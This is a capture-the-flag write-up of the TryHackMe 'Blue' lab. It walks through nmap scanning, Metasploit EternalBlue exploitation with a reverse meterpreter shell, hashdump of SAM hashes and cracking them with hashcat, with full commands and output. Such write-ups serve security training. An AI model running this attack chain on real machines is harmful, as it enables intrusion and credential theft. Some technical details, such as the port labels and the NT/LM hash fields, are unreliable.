7 minutes
TryHackMe - Blue Room
Before we begin, you can access this room by creating an account with tryhackme.com and browsing this link to join it, or by simply searching for “Blue” under the Hacktivities tab.
Scanning & Enumeration
Running nmap
nmap -sV -sC -oA nmap/top1000 10.10.196.230 -vv
There are quite a few interesting ports open on this box, amongst which
- 389 - RDP
- 445/139 - SMB
- 35 - RPC
As part of the nmap scan, we now know:
- this is a Windows 7 PC running Windows 7 Professional 7601 Service Pack 1
- the NETBIOS name is JON-PC
- the machine is in a WORKGROUP
- it is most likely still vulnerable to EternalBlue
For more info on EternalBlue (MS17-010) I suggest starting here.
Running enum4linux
Trying to enumerate SMB with enum4linux will not help in this case as the permissions are set properly and we get access denied errors.
We can’t enumerate SMB with smbclient either as the administrator account is disabled and anonymous access does not seem to be enabled.
smbclient -L \\\\10.10.196.230 -U 'administrator'
Enter WORKGROUP\administrator's password:
session setup failed: NT_STATUS_ACCOUNT_DISABLED
smbclient -L \\\\10.10.196.230 -U 'anonymous'
Enter WORKGROUP\anonymous's password:
session setup failed: NT_STATUS_LOGON_FAILURE
smbclient -L \\\\10.10.196.230 -U 'jon'
Enter WORKGROUP\test123's password:
session setup failed: NT_STATUS_LOGON_FAILURE
Let’s fire up our metasploit console and search for an exploit.
Gaining Access
Let’s use auxiliary/scanner/smb/smb_ms17_010 to scan the machine first and confirm it is vulnerable.
msf5 auxiliary(scanner/smb/smb_ms17_010) > options
Module options (auxiliary/scanner/smb/smb_ms17_010):
Name Current Setting Required Description
---- --------------- -------- -----------
CHECK_ARCH true no Check for architecture on vulnerable hosts
CHECK_DOPU true no Check for DOUBLEPULSAR on vulnerable hosts
CHECK_PIPE false no Check for named pipe on vulnerable hosts
NAMED_PIPES /usr/share/metasploit-framework/data/wordlists/named_pipes.txt yes List of named pipes to check
RHOSTS 10.10.196.230 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 445 yes The SMB service port (TCP)
SMBDomain . no The Windows domain to use for authentication
SMBPass no The password for the specified username
SMBUser no The username to authenticate as
THREADS 1 yes The number of concurrent threads (max one per host)
msf5 auxiliary(scanner/smb/smb_ms17_010) > run
[+] 10.10.196.230:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] 10.10.196.230:445 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed.
Vulnerable as we expected. Let’s try exploiting it:
msf5 > use exploit/windows/smb/ms17_010_eternalblue
msf5 exploit(windows/smb/ms17_010_eternalblue) > options
Module options (exploit/windows/smb/ms17_010_eternalblue):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 445 yes The target port (TCP)
SMBDomain . no (Optional) The Windows domain to use for authentication
SMBPass no (Optional) The password for the specified username
SMBUser no (Optional) The username to authenticate as
VERIFY_ARCH true yes Check if remote architecture matches exploit Target.
VERIFY_TARGET true yes Check if remote OS matches exploit Target.
Payload options (windows/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.0.110 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Windows 7 and Server 2008 R2 (x64) All Service Packs
msf5 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 10.10.196.230
RHOSTS => 10.10.196.230
msf5 exploit(windows/smb/ms17_010_eternalblue) > set LHOST tun0
LHOST => tun0
Running the exploit:
msf5 exploit(windows/smb/ms17_010_eternalblue) > run
[*] Started reverse TCP handler on 10.X.X.X:4444
[*] 10.10.196.230:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 10.10.196.230:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] 10.10.196.230:445 - Scanned 1 of 1 hosts (100% complete)
[*] 10.10.196.230:445 - Connecting to target for exploitation.
[+] 10.10.196.230:445 - Connection established for exploitation.
[+] 10.10.196.230:445 - Target OS selected valid for OS indicated by SMB reply
[*] 10.10.196.230:445 - CORE raw buffer dump (42 bytes)
[*] 10.10.196.230:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73 Windows 7 Profes
[*] 10.10.196.230:445 - 0x00000010 73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76 sional 7601 Serv
[*] 10.10.196.230:445 - 0x00000020 69 63 65 20 50 61 63 6b 20 31 ice Pack 1
[+] 10.10.196.230:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 10.10.196.230:445 - Trying exploit with 12 Groom Allocations.
[*] 10.10.196.230:445 - Sending all but last fragment of exploit packet
[*] 10.10.196.230:445 - Starting non-paged pool grooming
[+] 10.10.196.230:445 - Sending SMBv2 buffers
[+] 10.10.196.230:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 10.10.196.230:445 - Sending final SMBv2 buffers.
[*] 10.10.196.230:445 - Sending last fragment of exploit packet!
[*] 10.10.196.230:445 - Receiving response from exploit packet
[+] 10.10.196.230:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 10.10.196.230:445 - Sending egg to corrupted connection.
[*] 10.10.196.230:445 - Triggering free of corrupted buffer.
[*] Sending stage (201283 bytes) to 10.10.196.230
[*] Meterpreter session 1 opened (10.X.X.X:4444 -> 10.10.196.230:49220) at 2020-07-03 19:48:30 +0100
[+] 10.10.196.230:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.10.196.230:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.10.196.230:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
We are even logged in as SYSTEM:
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
Since I already got the highest privileges, there’s no need to upgrade my shell to meterpreter as I’m already in a meterpreter shell, however, if you need to do that, the steps to follow are:
- background your current shell with CTRL+Z
- list sessions by running sessions
- run sessions -u [session number] to upgrade to a meterpreter shell
For stability reasons, I suggest always migrating from whatever process was created when the exploit was run to a native process that has lsass level access, such as spoolsv.exe:
meterpreter > migrate 720
[*] Migrating from 1296 to 720...
[*] Migration completed successfully.
where 720 is the process id of spoolsv.exe
Dumping SAM Database Hashes
Now let’s try to dump all hashes and see if we can crack any. To do that, in your meterpreter session type hashdump
Note that these hashes are stored in the SAM database file in C:\Windows\System32\config
If we actually browse to that folder we get a cool little flag :)
Directory of C:\Windows\System32\config
07/03/2020 01:06 PM <DIR> .
07/03/2020 01:06 PM <DIR> ..
12/12/2018 06:00 PM 28,672 BCD-Template
07/03/2020 01:15 PM 18,087,936 COMPONENTS
07/03/2020 01:35 PM 262,144 DEFAULT
03/17/2019 02:32 PM 34 flag2.txt
07/13/2009 09:34 PM <DIR> Journal
07/03/2020 01:34 PM <DIR> RegBack
07/03/2020 01:34 PM 262,144 SAM
07/03/2020 01:15 PM 262,144 SECURITY
07/03/2020 02:05 PM 40,632,320 SOFTWARE
07/03/2020 02:11 PM 12,582,912 SYSTEM
11/20/2010 09:41 PM <DIR> systemprofile
12/12/2018 06:03 PM <DIR> TxR
8 File(s) 72,118,306 bytes
6 Dir(s) 20,431,114,240 bytes free
Hash breakdown (note that Jon’s hash as been replaced and it is not the actual hash found on tryhackme - you will need to get that on your own):
Jon:1000:xrh3nzg5yiyflvr6n1kcnwo88kiv6umd:oye9bbtdpjfzxfllhtmp0s4gb0u62o7o:::
- Jon is the username;
- 1000 is the RID (the actual account number in AD. User accounts start at 1000. You can read more on that here;
- xrh3nzg5yiyflvr6n1kcnwo88kiv6umd is the NT hash;
- 0ye9bbtdpjfzxfllhtmp0s4gb0u62o7o is the LM hash.
You can read more on NT/LM here.
Using hashcat, let’s find what module we can use to crack this hash:
man hashcat | grep -i NTLM
1000 = NTLM
5500 = NetNTLMv1-VANILLA / NetNTLMv1-ESS
5600 = NetNTLMv2
Looks like 1000 is our go-to. Shall we?
hashcat -m 1000 -a 0 -w 1 hash.txt /usr/share/wordlists/rockyou.txt --force
Session..........: hashcat
Status...........: Cracked
Hash.Name........: NTLM
Hash.Target......: oye9bbtdpjfzxfllhtmp0s4gb0u62o7o
Time.Started.....: Fri Jul 3 20:33:14 2020, (4 secs)
Time.Estimated...: Fri Jul 3 20:33:18 2020, (0 secs)
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 2140.9 kH/s (0.52ms) @ Accel:1024 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests
Progress.........: 10203136/14344385 (71.13%)
Rejected.........: 0/10203136 (0.00%)
Restore.Point....: 10199040/14344385 (71.10%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.#1....: alsinah -> alonsouriel
Note: hash.txt contains the entire NTLM hash including username and RID.
Finding the Flags
Now that we cracked the password, let’s find the flags.
First one is at the root of C::
Directory of C:\
03/17/2019 02:27 PM 24 flag1.txt
07/13/2009 10:20 PM <DIR> PerfLogs
04/12/2011 03:28 AM <DIR> Program Files
03/17/2019 05:28 PM <DIR> Program Files (x86)
12/12/2018 10:13 PM <DIR> Users
03/17/2019 05:36 PM <DIR> Windows
1 File(s) 24 bytes
5 Dir(s) 20,431,089,664 bytes free
Second one is where the SAM database is stored, as shown earlier.
Third one is in Jon’s Documents folder:
Directory of C:\Users\Jon\Documents
12/12/2018 10:49 PM <DIR> .
12/12/2018 10:49 PM <DIR> ..
03/17/2019 02:26 PM 37 flag3.txt
1 File(s) 37 bytes
2 Dir(s) 20,431,089,664 bytes free
To read these flags, use more flagx.txt
Special thanks to DarkStar7471 for this cool little room.